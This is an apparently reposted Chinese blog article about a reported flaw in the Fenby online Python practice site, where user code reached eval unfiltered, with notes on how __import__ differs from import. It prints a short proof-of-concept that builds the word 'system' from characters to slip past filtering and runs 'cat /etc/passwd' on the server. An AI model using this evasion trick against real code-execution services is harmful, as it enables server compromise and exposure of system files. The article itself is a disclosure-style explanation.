返回顶部
首页 > 资讯 > 后端开发 > Python >有意思的python***案例
  • 935
分享到

有意思的python***案例

有意思案例python 2023-01-31 07:01:22 935人浏览 泡泡鱼

Python 官方文档:入门教程 => 点击学习

摘要

今天在wooyun里看到一个有意思的漏洞。说它有意思,第一是思路很特别,当然也是因为安全做的很low,第二里面使用的python的poc有个小细节,特此分享一下。网站叫Fenby网,主要是为了Pythoner在线学习的,它有一个在线练习的功

今天在wooyun里看到一个有意思的漏洞。说它有意思,第一是思路很特别,当然也是因为安全做的很low,第二里面使用的python的poc有个小细节,特此分享一下。


网站叫Fenby网,主要是为了Pythoner在线学习的,它有一个在线练习的功能,可以输入代码,然后执行,测试运行结果。。。

于是楼主就注册了一个账号,URL:Http://www.fenby.com/course/units/xxxx

然后输入如下一段恶意代码:

import string

s = ["s","y","s","t","e","m"]

s = "".join(s)

cmd = "cat /etc/passwd"

code = "__import__('os')." + s + "('" + cmd + "')"

eval(code)


于是就这样了。。。

wKioL1VN6AWiXCoBAAGITIL72WQ123.jpg

这里我想说两点,第一造成漏洞的原因是没有过滤eval,第二代码里使用的import和__import__的不同。

import其实是调用的__import__但是如果直接写成 code = "__import__('package.module')",它的意思就不是说:import package.module as package

When the name variable is of the fORM package.module, normally, the top-level package (the name up till the first dot) is returned, not the module named by name.


--结束END--

本文标题: 有意思的python***案例

本文链接: https://www.lsjlt.com/news/191934.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • 有意思的python***案例
    今天在wooyun里看到一个有意思的漏洞。说它有意思,第一是思路很特别,当然也是因为安全做的很low,第二里面使用的python的poc有个小细节,特此分享一下。网站叫Fenby网,主要是为了pythoner在线学习的,它有一个在线练习的功...
    99+
    2023-01-31
    有意思 案例 python
  • ADO.NET方案是什么意思
    这篇文章将为大家详细讲解有关ADO.NET方案是什么意思,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。ADO.NET方案是将内存中的数据(即数据集)表述为XML,然后以XML格式传递给其他组件,但前提是要...
    99+
    2023-06-17
  • import在python中的意思
    import语句允许python程序员导入外部模块。包含以下步骤:使用import [module_name]导入整个模块;使用from [module_name] import [ob...
    99+
    2024-05-15
    python 标准库
  • java中的实例什么意思?
    实例是指基于某个类的对象实现。这一过程被称为实例化。实例生成:使用new关键字 (需要public修饰的构造方法,默认的无参构造会有被覆盖隐藏问题,使用框架时需要注意。也可以通过控制构造方法的访问修饰符,实现单例模式-懒汉|饿汉(双重检查锁...
    99+
    2019-12-20
    java
  • 有哪些Python实用案例
    本篇内容主要讲解“有哪些Python实用案例”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“有哪些Python实用案例”吧!1. 整理字符串输入整理用户输入的问题在编程过程中极为常见。通常情况下,...
    99+
    2023-06-16
  • python实战案例有哪些
    这篇文章将为大家详细讲解有关python实战案例有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。任务1、循环输出26个字母对应的ASCII码值x=97#代表的是a的ASCII值for _&n...
    99+
    2023-06-29
  • mysql实例什么意思
    mysql 实例是 mysql dbms 在服务器上运行的独立进程,存储、管理和检索数据。它由进程、数据文件、配置选项和日志文件组成。mysql 支持多种实例类型,包括主实例、从实例和独...
    99+
    2024-06-02
    mysql phpmyadmin
  • php有意思的函数有哪些
    本文操作环境:windows7系统、PHP7.1版、DELL G3电脑php有意思的函数有哪些?php一些有趣的函数:cli_set_process_title('abcd');给当前php进程取个响当当的名字;echo c...
    99+
    2022-01-23
    php 函数
  • Python小白的实用案例有哪些
    本篇内容介绍了“Python小白的实用案例有哪些”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!案例一:排列组合要求:将4个数字可能组成的所有...
    99+
    2023-06-17
  • Python文本处理的案例有哪些
    本篇内容主要讲解“Python文本处理的案例有哪些”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Python文本处理的案例有哪些”吧!1提取 PDF 内容# pip inst...
    99+
    2023-06-29
  • oracle实例是什么意思
    oracle 实例是数据库软件的运行时环境,提供数据库进程执行的沙箱。它的组件包括:系统全局区(sga):关键数据结构的共享内存程序全局区(pga):特定会话信息的私有内存数据库进程(d...
    99+
    2024-05-11
    oracle
  • redis实例是什么意思
    redis 实例是指一个独立的运行进程,用于存储和管理数据。每个实例拥有自己的配置、数据、持久化策略和客户端连接。它可用于缓存、消息队列、数据库和会话管理等用例。 Redis 实例 一...
    99+
    2024-06-12
    redis
  • python中的seth是什么意思
    python中seth是指Turtle库中的turtle.seth(angle)函数,表示了小乌龟启动时运动的方向,包含的输入参数是角度值,而Turtle库则是python中的一个绘制图像的函数库。具体使用步骤:首先打开python编辑器,...
    99+
    2024-04-02
  • python中+=指的是什么意思
    小编给大家分享一下python中+=指的是什么意思,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!python中+=的意思:1、两个值相加,返回值给符号左侧的变量;...
    99+
    2023-06-06
  • python中**指的是什么意思
    这篇文章主要介绍python中**指的是什么意思,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!在python中,“**”表示幂运算,只需要在两数之间用上“**”,就表明这两个数字进行乘方运算;其中第一操作数为底数,第...
    99+
    2023-06-14
  • python中@指的是什么意思
    这篇文章主要介绍了python中@指的是什么意思,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。python主要应用领域有哪些1、云计算,典型应用OpenStack。2、WEB...
    99+
    2023-06-14
  • python中 *= 指的是什么意思
    这篇文章将为大家详细讲解有关python中 *= 指的是什么意思,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。python有哪些常用库python常用的库:1.requesuts;2.scrapy;3.p...
    99+
    2023-06-14
  • python中==指的是什么意思
    小编给大家分享一下python中==指的是什么意思,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!Python的优点有哪些1、简单易用,与C/C++、Java、C# 等传统语言相比,Python对代码格式的要求没有那么严格;...
    99+
    2023-06-14
  • python中的ide是什么意思
    这篇文章主要介绍python中的ide是什么意思,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!python的五大特点是什么python的五大特点:1.简单易学,开发程序时,专注的是解决问题,而不是搞明白语言本身。2....
    99+
    2023-06-14
  • python库指的是什么意思
    这篇文章主要介绍了python库指的是什么意思,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。python主要应用领域有哪些1、云计算,典型应用OpenStack。2、WEB前...
    99+
    2023-06-14
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作